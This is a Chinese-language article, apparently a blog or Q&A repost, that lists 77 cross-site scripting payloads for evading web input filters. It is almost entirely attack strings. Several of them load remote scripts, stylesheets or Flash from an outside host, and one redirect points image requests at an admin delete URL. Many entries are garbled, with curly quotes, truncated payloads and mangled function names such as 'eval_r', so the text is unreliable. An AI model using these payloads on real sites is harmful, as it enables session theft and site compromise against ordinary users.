XSS跨站腳本攻擊匯總

XSS跨站腳本攻擊匯總

4 人贊了文章

(1)普通的XSS JavaScript注入

<SCRIPT SRC=3w.org/XSS/xss.js></SCRIPT>

(2)IMG標籤XSS使用JavaScript命令

<SCRIPT SRC=3w.org/XSS/xss.js></SCRIPT>

(3)IMG標籤無分號無引號

<IMG SRC=javascript:alert(『XSS』)>

(4)IMG標籤大小寫不敏感

<IMG SRC=JaVaScRiPt:alert(『XSS』)>

(5)HTML編碼(必須有分號)

<IMG SRC=javascript:alert(「XSS」)>

(6)修正缺陷IMG標籤

<IMG 「」"><SCRIPT>alert(「XSS」)</SCRIPT>」>

(7)formCharCode標籤(計算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode編碼(計算器)

<IMG SRC=jav..省略..S)>

(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)

<IMG SRC=jav..省略..S)>

(10)十六進位編碼也是沒有分號(計算器)

<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式標籤,將Javascript分開

<IMG SRC=」jav ascript:alert(『XSS』);」>

(12)嵌入式編碼標籤,將Javascript分開

<IMG SRC=」jav ascript:alert(『XSS』);」>

(13)嵌入式換行符

<IMG SRC=」jav ascript:alert(『XSS』);」>

(14)嵌入式回車

<IMG SRC=」jav ascript:alert(『XSS』);」>

(15)嵌入式多行注入JavaScript,這是XSS極端的例子

<IMG SRC=」javascript:alert(『XSS『)」>

(16)解決限制字元(要求同頁面)

<script>z=』document.』</script>

<script>z=z+』write(「『</script>

<script>z=z+』<script』</script>

<script>z=z+』 src=ht』</script>

<script>z=z+』tp://ww』</script>

<script>z=z+』w.shell』</script>

<script>z=z+』.net/1.』</script>

<script>z=z+』js></sc』</script>

<script>z=z+』ript>」)』</script>

<script>eval_r(z)</script>

(17)空字元

perl -e 『print 「<IMG SRC=javascript:alert(」XSS」)>」;』 > out

(18)空字元2,空字元在國內基本沒效果.因為沒有地方可以利用

perl -e 『print 「<SCRIPT>alert(」XSS」)</SCRIPT>」;』 > out

(19)Spaces和meta前的IMG標籤

<IMG SRC=」 javascript:alert(『XSS』);」>

(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=」3w.org/XSS/xss.js」></SCRIPT>

(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert(「XSS」)>

(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=」3w.org/XSS/xss.js」></SCRIPT>

(23)雙開括弧

<<SCRIPT>alert(「XSS」);//<</SCRIPT>

(24)無結束腳本標記(僅火狐等瀏覽器)

<SCRIPT SRC=3w.org/XSS/xss.js<B>

(25)無結束腳本標記2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半開的HTML/JavaScript XSS

<IMG SRC=」javascript:alert(『XSS』)」

(27)雙開角括弧

<iframe src=3w.org/XSS.html <

(28)無單引號 雙引號 分號

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

(29)換碼過濾的JavaScript

」;alert(『XSS』);//

(30)結束Title標籤

</TITLE><SCRIPT>alert(「XSS」);</SCRIPT>

(31)Input Image

<INPUT SRC=」javascript:alert(『XSS』);」>

(32)BODY Image

<BODY BACKGROUND=」javascript:alert(『XSS』)」>

(33)BODY標籤

<BODY(『XSS』)>

(34)IMG Dynsrc

<IMG DYNSRC=」javascript:alert(『XSS』)」>

(35)IMG Lowsrc

<IMG LOWSRC=」javascript:alert(『XSS』)」>

(36)BGSOUND

<BGSOUND SRC=」javascript:alert(『XSS』);」>

(37)STYLE sheet

<LINK REL=」stylesheet」 HREF=」javascript:alert(『XSS』);」>

(38)遠程樣式表

<LINK REL=」stylesheet」 HREF=」3w.org/xss.css」>

(39)List-style-image(列表式)

<STYLE>li {list-style-image: url(「javascript:alert(『XSS』)」);}</STYLE><UL><LI>XSS

(40)IMG VBscript

<IMG SRC=』vbscript:msgbox(「XSS」)』></STYLE><UL><LI>XSS

(41)META鏈接url

<META HTTP-EQUIV=」refresh」 CONTENT=」0; URL=http://;URL=javascript:alert(『XSS』);」>

(42)Iframe

<IFRAME SRC=」javascript:alert(『XSS』);」></IFRAME>

(43)Frame

<FRAMESET><FRAME SRC=」javascript:alert(『XSS』);」></FRAMESET>

(44)Table

<TABLE BACKGROUND=」javascript:alert(『XSS』)」>

(45)TD

<TABLE><TD BACKGROUND=」javascript:alert(『XSS』)」>

(46)DIV background-image

<DIV STYLE=」background-image: none)」>

(47)DIV background-image後加上額外字元(1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE=」background-image: none)」>

(48)DIV expression

<DIV STYLE=」width: expression_r(alert(『XSS』));」>

(49)STYLE屬性分拆表達

<IMG STYLE=」xss:expression_r(alert(『XSS』))」>

(50)匿名STYLE(組成:開角號和一個字母開頭)

<XSS STYLE=」xss:expression_r(alert(『XSS』))」>

(51)STYLE background-image

<STYLE>.XSS{background-image:none」);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式

exppression(alert(「XSS」))』>

(53)STYLE background

<STYLE><STYLE type=」text/css」>BODY{background:url(「javascript:alert(『XSS』)」)}</STYLE>

(54)BASE

<BASE HREF=」javascript:alert(『XSS』);//」>

(55)EMBED標籤,你可以嵌入FLASH,其中包涵XSS

<EMBED SRC=」3w.org/XSS/xss.swf」 ></EMBED>

(56)在flash中使用ActionScrpt可以混進你XSS的代碼

a=」get」;

b=」URL(」";

c=」javascript:」;

d=」alert(『XSS』);」)」;

eval_r(a+b+c+d);

(57)XML namespace.HTC文件必須和你的XSS載體在一台伺服器上

<HTML xmlns:xss>

<?import namespace=」xss」 implementation=」3w.org/XSS/xss.htc」>

<xss:xss>XSS</xss:xss>

</HTML>

(58)如果過濾了你的JS你可以在圖片里添加JS代碼來利用

<SCRIPT SRC=」」></SCRIPT>

(59)IMG嵌入式命令,可執行任意命令

<IMG SRC=」XXX.com/a.php?」>

(60)IMG嵌入式命令(a.jpg在同伺服器)

Redirect 302 /a.jpg XXX.com/admin.asp&delet

(61)繞符號過濾

<SCRIPT a=」>」 SRC=」3w.org/xss.js」></SCRIPT>

(62)

<SCRIPT =」>」 SRC=」3w.org/xss.js」></SCRIPT>

(63)

<SCRIPT a=」>」 」 SRC=」3w.org/xss.js」></SCRIPT>

(64)

<SCRIPT 「a=』>』」 SRC=」3w.org/xss.js」></SCRIPT>

(65)

<SCRIPT a=`>` SRC=」3w.org/xss.js」></SCRIPT>

(66)

<SCRIPT a=」>』>」 SRC=」3w.org/xss.js」></SCRIPT>

(67)

<SCRIPT>document.write(「<SCRI」);</SCRIPT>PT SRC=」3w.org/xss.js」></SCRIPT>

(68)URL繞行

<A HREF=」http://127.0.0.1/」>XSS</A>

(69)URL編碼

<A HREF=」3w.org」>XSS</A>

(70)IP十進位

<A HREF=」3232235521″>XSS</A>

(71)IP十六進位

<A HREF=」0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八進位

<A HREF=」0300.0250.0000.0001″>XSS</A>

(73)混合編碼

<A HREF=」h

tt p://6 6.000146.0×7.147/」">XSS</A>

(74)節省[http:]

<A HREF=」//www.google.com/」>XSS</A>

(75)節省[www]

<A HREF=」google.com/」>XSS</A>

(76)絕對點絕對DNS

<A HREF=」google.com./」>XSS</A>

(77)javascript鏈接

<A HREF=」javascript:document.location=』google.com/』」>XSS</A>

我的公眾號:安全犀牛


推薦閱讀:

如何評價2018強網杯線下賽?
如何讓黑哥將多年的功力傳授於我?
完整的網站滲透測試,結束前如何確保痕迹的清理?
AI技術被黑客利用?
黑客進攻時的屏幕是怎樣的?

TAG:XSS | 黑客Hacker | 計算機科學 |